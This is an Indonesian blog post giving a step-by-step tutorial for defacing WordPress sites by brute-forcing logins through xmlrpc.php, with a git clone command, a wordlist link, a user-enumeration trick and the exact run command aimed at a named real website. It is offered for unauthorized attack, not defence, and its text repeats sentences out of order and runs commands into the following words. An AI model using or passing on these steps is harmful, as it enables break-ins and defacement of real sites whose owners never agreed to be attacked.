Wednesday, July 15, 2020
Yow halo exploiter, ok kali ini saya akan membagikan tutorial deface metode XMLRPC Brute Force tutorial yang ini memakai tools CLI ( Command Line Interface ) gak make bot ya, heker kok ngebot, mati aja xixix.. tools XMLRPC Brute Force ini dibuat oleh Zeerx7. toolsnya bisa di pakai di termux / cmd / terminal kesayangan kalian.
trus simpan di directory xmlrpc-bf dengan extensi .txt contoh : pass.txt
dan jangan lupa sebelum di bruteforce cek usernya dulu dengan cara http://target.com/?author=1
setelah itu jalankan script
kalo gak dapet ya sabar h3h3. kurang jelas ? tonton video di bawah..
untuk dork ? cek artikel ini : https://sec.linuxploit.com/2020/02/tools-wp-bruteforce-wordlist-dork.html
ok langsung saja disini saya sudah memiliki target yaitu : http://wwlcpa.com/xmlrpc.php
masuk ke terminal kalian kemudian masukkan perintah
git clone https://github.com/404rgr/xmlrpc-bfkemudian masuk ke directorynya
cd xmlrpc-bfkalian bisa mengambil wordlist brute force : https://pastebin.com/raw/jtnRM6Vm
trus simpan di directory xmlrpc-bf dengan extensi .txt contoh : pass.txt
dan jangan lupa sebelum di bruteforce cek usernya dulu dengan cara http://target.com/?author=1
setelah itu jalankan script
php xmlrpc.php [ Target ] [ User ] [ List Password ]contoh :
php xmlrpc.php http://wwlcpa.com/xmlrpc.php admin pass.txtselanjutnya kalian hanya harus sabar menunggu passwordnya
kalo gak dapet ya sabar h3h3. kurang jelas ? tonton video di bawah..